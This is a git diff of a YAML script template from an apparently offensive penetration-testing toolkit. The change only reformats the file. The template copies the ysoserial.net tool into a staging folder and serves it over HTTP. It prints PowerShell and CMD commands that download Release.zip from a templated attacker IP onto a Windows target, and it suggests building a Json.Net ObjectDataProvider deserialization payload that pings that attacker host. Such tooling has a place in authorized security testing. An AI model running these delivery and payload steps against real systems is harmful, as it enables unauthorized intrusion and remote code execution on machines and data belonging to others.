--- a/src/profi/templates/scripts/deliver-windows-ysoserial-net.yaml
+++ b/src/profi/templates/scripts/deliver-windows-ysoserial-net.yaml
@@ -1,21 +1,21 @@
+---
 metadata:
-  filename: deliver-windows-ysoserial-net.yaml
-  tags:
-  - windows
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; cp -n {{ tools_dir }}/ysoserial-net/Release.zip\
-  \ packstation/outbound; \\\necho '================================================================';\
-  \ \\\necho '                      -----PowerShell-----                      '; \\\
-  \necho 'Deliver only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/Release.zip -Outfile {{ delivery_path_windows }}\\Release.zip'; \\\necho '================================================================';\
-  \ \\\necho '                         -----CMD-----                          '; \\\
-  \necho 'Deliver only: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port\
-  \ }}/Release.zip -Outfile {{ delivery_path_windows }}\\Release.zip'; \\\necho '================================================================';\
-  \ \\\necho '                      -Suggested Commands-                      '; \\\
-  \necho 'Expand Archive: Expand-Archive {{ delivery_path_windows }}\\Release.zip\
-  \ -DestinationPath {{ delivery_path_windows }}\\Release'; \\\necho 'Create PoC-Payload:\
-  \ {{ delivery_path_windows }}\\Release\\ysoserial.exe -g ObjectDataProvider -f Json.Net\
-  \ -c \"ping -n 5 {{ attacker_ip }}\" -o base64'; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-windows-ysoserial-net.yaml"
+  tags: ["windows"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; cp -n {{ tools_dir }}/ysoserial-net/Release.zip packstation/outbound; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Deliver only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Release.zip -Outfile {{ delivery_path_windows }}\Release.zip'; \
+  echo '================================================================'; \
+  echo '                         -----CMD-----                          '; \
+  echo 'Deliver only: powershell wget -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/Release.zip -Outfile {{ delivery_path_windows }}\Release.zip'; \
+  echo '================================================================'; \
+  echo '                      -Suggested Commands-                      '; \
+  echo 'Expand Archive: Expand-Archive {{ delivery_path_windows }}\Release.zip -DestinationPath {{ delivery_path_windows }}\Release'; \
+  echo 'Create PoC-Payload: {{ delivery_path_windows }}\Release\ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 {{ attacker_ip }}" -o base64'; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
